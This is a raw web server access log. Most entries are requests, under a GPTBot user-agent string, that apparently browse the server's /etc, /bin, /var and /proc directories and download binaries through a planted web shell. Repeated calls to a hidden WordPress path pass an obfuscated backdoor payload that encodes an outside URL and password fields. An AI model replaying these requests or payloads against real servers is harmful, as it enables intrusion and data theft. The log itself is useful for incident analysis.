74.7.227.128 - - [06/Nov/2025:00:46:54 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php54 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:46:57 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php55 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:47:04 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php51 HTTP/2" 200 2807 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:47:08 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php52 HTTP/2" 200 2807 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:45:11 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383331312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343731312q6535383733393434346161643331373661663132333462303361623838643762222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:47:13 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php53 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:47:17 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php70 HTTP/2" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:47:24 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php71 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:47:27 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php56 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:47:30 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php73 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:45:33 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383333332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343733332q3463623662326137366631303862343564326530356561643564323162613461222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:47:36 +0700] "GET /shopbrand1093571503?path=//etc HTTP/2" 200 5222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:47:40 +0700] "GET /shopbrand1093488824?path=//etc/cl.php.d/alt-php72 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:47:46 +0700] "GET /shopbrand1093604023?path=//usr HTTP/2" 200 3033 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:47:50 +0700] "GET /shopbrand1093657736?path=//var HTTP/2" 200 3202 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:45:55 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383335352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343735352q6233343366646330373934656339303337303566313065373630366631636533222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:47:57 +0700] "GET /shopbrand1093657736?path=//bin HTTP/2" 200 17649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:48:04 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d HTTP/2" 200 3011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:48:08 +0700] "GET /shopbrand1093690126?path=//etc HTTP/2" 200 5181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:48:15 +0700] "GET /shopbrand1093657736?path=//run HTTP/2" 200 3194 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:46:17 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383337372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343737372q6530323762316133333637343137343362306631313739343433353438656561222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:48:18 +0700] "GET /shopbrand1093657736?path=//var/lve HTTP/2" 200 3029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:48:25 +0700] "GET /shopbrand1093657736?fileloc=//bin/lex&path=//bin HTTP/2" 200 120060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:48:30 +0700] "GET /shopbrand1093657736?fileloc=//bin/objdump&path=//bin HTTP/2" 200 149444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:48:38 +0700] "GET /shopbrand1093657736?fileloc=//bin/createdb&path=//bin HTTP/2" 200 23721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:46:39 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383339392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343739392q3661346334383533396431333234666166323136643961656535356334303933222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:48:42 +0700] "GET /shopbrand1093657736?path=//var/lve/php.dat.d HTTP/2" 200 3187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:48:48 +0700] "GET /shopbrand1093657736?fileloc=//bin/net-snmp-create-v3-user&path=//bin HTTP/2" 200 3623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:48:51 +0700] "GET /shopbrand1093657736?fileloc=//bin/uname&path=//bin HTTP/2" 200 15090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:48:57 +0700] "GET /shopbrand1093657736?path=//var/php HTTP/2" 200 2776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:49:01 +0700] "GET /shopbrand1093657736?path=//usr HTTP/2" 200 2999 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:47:01 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383432312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343832312q3064326536306166396462636431323230636465393630393632383663326630222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:49:06 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php44 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:49:10 +0700] "GET /shopbrand1093657736?fileloc=//var/lve/php.dat.d/php7.1.dat&path=//var/lve/php.dat.d HTTP/2" 200 2645 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:49:13 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php81 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:49:19 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php56 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:47:23 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383434332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343834332q3434343364613664623965333639393935623131343739333834663036353165222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:49:25 +0700] "GET /shopbrand1093657736?path=//var/php/apm HTTP/2" 200 2787 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:49:29 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php52 HTTP/2" 200 2807 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:49:35 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php54 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:49:38 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php83 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:49:45 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php72 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:47:46 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383436362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343836362q3035333231623763383137326632633034363862306130643939633566383132222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:49:52 +0700] "GET /shopbrand1093657736?path=//var/php/apm/db HTTP/2" 200 2539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:49:56 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php74 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
173.249.34.184 - - [06/Nov/2025:00:49:57 +0700] "GET /postnews.php HTTP/1.1" 200 4271 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
74.7.227.128 - - [06/Nov/2025:00:49:58 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php80 HTTP/2" 200 2809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:50:05 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php70 HTTP/2" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
173.249.34.184 - - [06/Nov/2025:00:50:07 +0700] "GET /ss.php?f_c=1 HTTP/1.1" 200 4145 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.7.226.137 - - [06/Nov/2025:00:48:08 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383438382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343838382q3635666533396230646430346634316131613863646463303864343466656263222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:50:08 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php51 HTTP/2" 200 2807 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:50:14 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php71 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:50:18 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php73 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:50:24 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php55 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:50:27 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php53 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:48:30 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383531302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343931302q6636636536336465333038373133373832623661353938333266343639383333222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:50:34 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php84 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:50:37 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d HTTP/2" 200 3011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:50:44 +0700] "GET /shopbrand1093571503?path=//etc/cl.php.d/alt-php82 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:50:47 +0700] "GET /shopbrand1093604023?path=//sbin HTTP/2" 200 3958 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:48:52 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383533322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343933322q3131313434313063393937316562313232663738666361396437626434656334222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:50:53 +0700] "GET /shopbrand1093657736?path=//proc HTTP/2" 200 3344 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:50:57 +0700] "GET /shopbrand1093604023?path=//var HTTP/2" 200 3202 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:04 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php82 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:07 +0700] "GET /shopbrand1093690126?path=//usr HTTP/2" 200 3033 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:13 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php52 HTTP/2" 200 2807 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:49:15 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383535352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343935352q6236653862383962653132643535613833656137623033313333623163373038222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:51:17 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php71 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:20 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php73 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:26 +0700] "GET /shopbrand1093604023?path=//var/php HTTP/2" 200 2776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:29 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php70 HTTP/2" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:35 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php81 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:49:37 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383537372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343937372q6662373663623635366133323933316464383262633733613835343739323739222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:51:38 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php51 HTTP/2" 200 2807 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:44 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php56 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:48 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php53 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:54 +0700] "GET /shopbrand1093604023?path=//var/php/apm HTTP/2" 200 2787 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:51:57 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php55 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:49:59 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383539392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336343939392q6436363865323265616531383563363266333962663139333464383732373030222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:00:52:00 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php72 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:52:06 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php83 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:52:09 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php80 HTTP/2" 200 2809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.73.66 - - [06/Nov/2025:00:52:13 +0700] "GET /shopbrand546008757?kg=0544819654 HTTP/1.1" 200 26058 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:00:52:16 +0700] "GET /shopbrand1093690126?path=//etc/cl.php.d/alt-php44 HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:00:52:20 +0700] "GET /shopbrand1093604023?path=//var/php/apm/db HTTP/2" 200 2539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:00:50:21 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323336383632312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336353032312q3830663663633139663461666461616238656435643936343433663433326132222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
